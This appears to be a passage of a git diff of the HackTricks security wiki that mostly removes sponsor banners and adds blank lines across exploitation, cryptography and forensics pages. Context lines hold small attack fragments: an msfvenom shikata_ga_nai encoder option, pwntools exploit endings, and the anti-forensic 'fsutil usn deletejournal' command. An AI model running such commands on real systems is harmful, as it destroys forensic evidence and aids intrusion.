a/src/binary-exploitation/stack-overflow/ret2win/README.md +++ b/src/binary-exploitation/stack-overflow/ret2win/README.md @@ -113,3 +113,5 @@ ret2win-arm64.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md index 410cf5cf0..ca102d444 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md +++ b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md @@ -187,3 +187,5 @@ p.close() ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index a786dea8e..6e7d80c73 100644 --- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md @@ -234,3 +234,5 @@ Also in the following page you can see the equivalent of **Ret2esp in ARM64**: {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md index 187c832b7..702645a59 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md @@ -95,3 +95,5 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md index 3ad3e61ac..24585eb5c 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md @@ -79,3 +79,5 @@ The only "complicated" thing to find here would be the address in the stack to c I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/stack-overflow/uninitialized-variables.md b/src/binary-exploitation/stack-overflow/uninitialized-variables.md index 6cde48bee..dbe8f1c01 100644 --- a/src/binary-exploitation/stack-overflow/uninitialized-variables.md +++ b/src/binary-exploitation/stack-overflow/uninitialized-variables.md @@ -66,3 +66,5 @@ int main() { This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md index fb6f62862..3758e559d 100644 --- a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md +++ b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md @@ -259,3 +259,5 @@ EXITFUNC=thread -e x86/shikata_ga_nai ``` {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/blockchain/blockchain-and-crypto-currencies/README.md b/src/blockchain/blockchain-and-crypto-currencies/README.md index c897d0035..81b4615c0 100644 --- a/src/blockchain/blockchain-and-crypto-currencies/README.md +++ b/src/blockchain/blockchain-and-crypto-currencies/README.md @@ -184,3 +184,5 @@ These practices and mechanisms are foundational for anyone looking to engage wit - [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/blockchain-and-crypto-currencies.md b/src/crypto-and-stego/blockchain-and-crypto-currencies.md index 71b79f58f..cce65e9f9 100644 --- a/src/crypto-and-stego/blockchain-and-crypto-currencies.md +++ b/src/crypto-and-stego/blockchain-and-crypto-currencies.md @@ -184,3 +184,5 @@ These practices and mechanisms are foundational for anyone looking to engage wit - [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/certificates.md b/src/crypto-and-stego/certificates.md index d0c4ad006..b7871f8e9 100644 --- a/src/crypto-and-stego/certificates.md +++ b/src/crypto-and-stego/certificates.md @@ -2,14 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %} - ## What is a Certificate A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. @@ -211,12 +203,6 @@ openssl asn1parse -genconf certificatename.tpl -outform PEM -out certificatename --- -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %} - {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md index 47f1b2713..9babc544a 100644 --- a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md +++ b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md @@ -53,3 +53,5 @@ Now, if you can control the IV, you can change the first Byte of the IV so **IV\ More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/crypto-ctfs-tricks.md b/src/crypto-and-stego/crypto-ctfs-tricks.md index bb2b5f049..d5e6a1f20 100644 --- a/src/crypto-and-stego/crypto-ctfs-tricks.md +++ b/src/crypto-and-stego/crypto-ctfs-tricks.md @@ -299,3 +299,5 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). - [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/cryptographic-algorithms/README.md b/src/crypto-and-stego/cryptographic-algorithms/README.md index bcfcf1d0a..a70912cb4 100644 --- a/src/crypto-and-stego/cryptographic-algorithms/README.md +++ b/src/crypto-and-stego/cryptographic-algorithms/README.md @@ -183,3 +183,5 @@ Check **3 comparisons to recognise it**: ![](<../../images/image (430).png>) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md index 6699ec26f..fa9e007e4 100644 --- a/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md +++ b/src/crypto-and-stego/cryptographic-algorithms/unpacking-binaries.md @@ -22,3 +22,5 @@ - When you dump an executable from a region of memory you can fix some headers using [PE-bear](https://github.com/hasherezade/pe-bear-releases/releases). {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/electronic-code-book-ecb.md b/src/crypto-and-stego/electronic-code-book-ecb.md index a09798b1e..8d1180ce1 100644 --- a/src/crypto-and-stego/electronic-code-book-ecb.md +++ b/src/crypto-and-stego/electronic-code-book-ecb.md @@ -72,3 +72,5 @@ The cookie of this user is going to be composed by 3 blocks: the first 2 is the - [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)]() {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md index 2faf6564f..2b1be3259 100644 --- a/src/crypto-and-stego/esoteric-languages.md +++ b/src/crypto-and-stego/esoteric-languages.md @@ -67,3 +67,5 @@ Kukarek ``` {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md index 51a38df3f..b24f88bd8 100644 --- a/src/crypto-and-stego/hash-length-extension-attack.md +++ b/src/crypto-and-stego/hash-length-extension-attack.md @@ -36,3 +36,5 @@ If an attacker wants to append the string "append" he can: You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/padding-oracle-priv.md b/src/crypto-and-stego/padding-oracle-priv.md index 96d3145a3..3e4d1dbb3 100644 --- a/src/crypto-and-stego/padding-oracle-priv.md +++ b/src/crypto-and-stego/padding-oracle-priv.md @@ -2,8 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -{% embed url="https://websec.nl/" %} - ## CBC - Cipher Block Chaining In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: @@ -107,6 +105,7 @@ But if you BF the padding (using padbuster for example) you manage to get anothe - [https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation) -{% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index dc89fa296..00e933705 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -9,3 +9,5 @@ If you can encrypt a known plaintext you can also extract the password. More ref {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/crypto-and-stego/stego-tricks.md b/src/crypto-and-stego/stego-tricks.md index 91ed86406..d62dec11c 100644 --- a/src/crypto-and-stego/stego-tricks.md +++ b/src/crypto-and-stego/stego-tricks.md @@ -218,3 +218,5 @@ For translating Braille, the [Branah Braille Translator](https://www.branah.com/ - [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/certificates.md b/src/cryptography/certificates.md index 622b48c61..777620734 100644 --- a/src/cryptography/certificates.md +++ b/src/cryptography/certificates.md @@ -2,14 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## What is a Certificate A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. @@ -184,12 +176,6 @@ openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certif --- -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/cipher-block-chaining-cbc-mac-priv.md b/src/cryptography/cipher-block-chaining-cbc-mac-priv.md index 47f1b2713..9babc544a 100644 --- a/src/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/src/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -53,3 +53,5 @@ Now, if you can control the IV, you can change the first Byte of the IV so **IV\ More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/crypto-ctfs-tricks.md b/src/cryptography/crypto-ctfs-tricks.md index bb2b5f049..d5e6a1f20 100644 --- a/src/cryptography/crypto-ctfs-tricks.md +++ b/src/cryptography/crypto-ctfs-tricks.md @@ -299,3 +299,5 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). - [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/electronic-code-book-ecb.md b/src/cryptography/electronic-code-book-ecb.md index a09798b1e..8d1180ce1 100644 --- a/src/cryptography/electronic-code-book-ecb.md +++ b/src/cryptography/electronic-code-book-ecb.md @@ -72,3 +72,5 @@ The cookie of this user is going to be composed by 3 blocks: the first 2 is the - [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)]() {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/hash-length-extension-attack.md b/src/cryptography/hash-length-extension-attack.md index 837cedd01..3bcd0e4a2 100644 --- a/src/cryptography/hash-length-extension-attack.md +++ b/src/cryptography/hash-length-extension-attack.md @@ -34,3 +34,5 @@ If an attacker wants to append the string "append" he can: You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/padding-oracle-priv.md b/src/cryptography/padding-oracle-priv.md index 499b42d4b..faa40fa94 100644 --- a/src/cryptography/padding-oracle-priv.md +++ b/src/cryptography/padding-oracle-priv.md @@ -2,8 +2,6 @@
-{% embed url="https://websec.nl/" %} - # CBC - Cipher Block Chaining In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: @@ -109,6 +107,6 @@ But if you BF the padding (using padbuster for example) you manage to get anothe
-{% embed url="https://websec.nl/" %} - {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/cryptography/rc4-encrypt-and-decrypt.md b/src/cryptography/rc4-encrypt-and-decrypt.md index dc89fa296..00e933705 100644 --- a/src/cryptography/rc4-encrypt-and-decrypt.md +++ b/src/cryptography/rc4-encrypt-and-decrypt.md @@ -9,3 +9,5 @@ If you can encrypt a known plaintext you can also extract the password. More ref {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/emails-vulns.md b/src/emails-vulns.md index 15d9cc343..42d15f27f 100644 --- a/src/emails-vulns.md +++ b/src/emails-vulns.md @@ -8,3 +8,4 @@ {{#include ./banners/hacktricks-training.md}} + diff --git a/src/exploiting/linux-exploiting-basic-esp/README.md b/src/exploiting/linux-exploiting-basic-esp/README.md index b0feaf1a9..11fd1be6e 100644 --- a/src/exploiting/linux-exploiting-basic-esp/README.md +++ b/src/exploiting/linux-exploiting-basic-esp/README.md @@ -550,3 +550,5 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu - [**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/exploiting/linux-exploiting-basic-esp/fusion.md b/src/exploiting/linux-exploiting-basic-esp/fusion.md index 344a72d02..cbab78081 100644 --- a/src/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/src/exploiting/linux-exploiting-basic-esp/fusion.md @@ -62,3 +62,5 @@ r.interactive() ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/exploiting/tools/README.md b/src/exploiting/tools/README.md index 0ca40e712..390d37dc3 100644 --- a/src/exploiting/tools/README.md +++ b/src/exploiting/tools/README.md @@ -226,3 +226,5 @@ Then, configure the debugger: Debugger (linux remote) --> Proccess options...: ![](<../../images/image (101).png>) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/exploiting/tools/pwntools.md b/src/exploiting/tools/pwntools.md index a7c0aa204..0d2764cdd 100644 --- a/src/exploiting/tools/pwntools.md +++ b/src/exploiting/tools/pwntools.md @@ -172,3 +172,5 @@ pwn update ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index 1f8119bb8..077f2fe7b 100644 --- a/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/src/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -259,3 +259,5 @@ EXITFUNC=thread -e x86/shikata_ga_nai ``` {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/README.md b/src/forensics/basic-forensic-methodology/README.md index e725dfa85..531ec98f0 100644 --- a/src/forensics/basic-forensic-methodology/README.md +++ b/src/forensics/basic-forensic-methodology/README.md @@ -80,3 +80,5 @@ file-integrity-monitoring.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 615ede378..7f2512d6c 100644 --- a/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,8 +1,5 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} # Timestamps @@ -152,8 +149,7 @@ It's also possible to modify the configuration of which files are going to be co - `fsutil usn deletejournal /d c:` -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/docker-forensics.md b/src/forensics/basic-forensic-methodology/docker-forensics.md index 629251985..17a36b6cb 100644 --- a/src/forensics/basic-forensic-methodology/docker-forensics.md +++ b/src/forensics/basic-forensic-methodology/docker-forensics.md @@ -2,11 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} ## Container modification @@ -122,10 +117,7 @@ Note that when you run a docker container inside a host **you can see the proces Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory). -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 214b917cf..a1e4d8502 100644 --- a/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -24,3 +24,5 @@ File Integrity Monitoring (FIM) is a critical security technique that protects I - [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/linux-forensics.md b/src/forensics/basic-forensic-methodology/linux-forensics.md index 8d505942f..b832648ec 100644 --- a/src/forensics/basic-forensic-methodology/linux-forensics.md +++ b/src/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,13 +1,5 @@ # Linux Forensics -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../banners/hacktricks-training.md}} ## Initial Information Gathering @@ -150,14 +142,6 @@ icat -i raw -f ext4 disk.img 16 ThisisTheMasterSecret ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Search for known Malware ### Modified System Files @@ -200,14 +184,6 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" find / -type f -executable | grep ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Recover Deleted Running Binaries Imagine a process that was executed from /tmp/exec and then deleted. It's possible to extract it @@ -343,14 +319,6 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Review User Accounts and Logon Activities Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ @@ -429,10 +397,4 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ {{#include ../../banners/hacktricks-training.md}} -
-\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/src/forensics/basic-forensic-methodology/malware-analysis.md b/src/forensics/basic-forensic-methodology/malware-analysis.md index c7edd6650..b3d7379c3 100644 --- a/src/forensics/basic-forensic-methodology/malware-analysis.md +++ b/src/forensics/basic-forensic-methodology/malware-analysis.md @@ -170,3 +170,5 @@ If the files of a folder **shouldn't have been modified**, you can calculate the When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 0d48e3bc2..20cd58d5d 100644 --- a/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Start Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). @@ -40,10 +34,6 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth** ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 02ab3ddf6..7d45bfd90 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -234,3 +234,5 @@ You may notice that even performing that action there might be **other parts whe - **iHackLabs Certified Digital Forensics Windows** {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index cd9e13a58..26e3eca31 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -93,3 +93,5 @@ You can use [**viu** ](https://github.com/atanunq/viu)to see images from the ter You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index f076c885c..df1bcf771 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -72,3 +72,5 @@ You can use [**viu** ](https://github.com/atanunq/viu)to see images form the ter You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/README.md b/src/forensics/basic-forensic-methodology/pcap-inspection/README.md index 9e6ebd08d..2e592bf93 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -2,12 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - > [!NOTE] > A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. @@ -101,12 +95,6 @@ Using common carving techniques can be useful to extract files and information f You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - ## Check Exploits/Malware ### Suricata @@ -237,10 +225,6 @@ usb-keystrokes.md ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index 9f63fbab3..e51ccb2ea 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -12,3 +12,5 @@ You can read more information and find some scripts about how to analyse this in - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 9c3dba419..6bbe7e8ef 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -17,3 +17,5 @@ You can read more information and find some scripts about how to analyse this in - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 36413cf70..fa4d2edf6 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -39,3 +39,5 @@ Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit ![](<../../../images/image (426).png>) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index ec397e99a..be52ee567 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
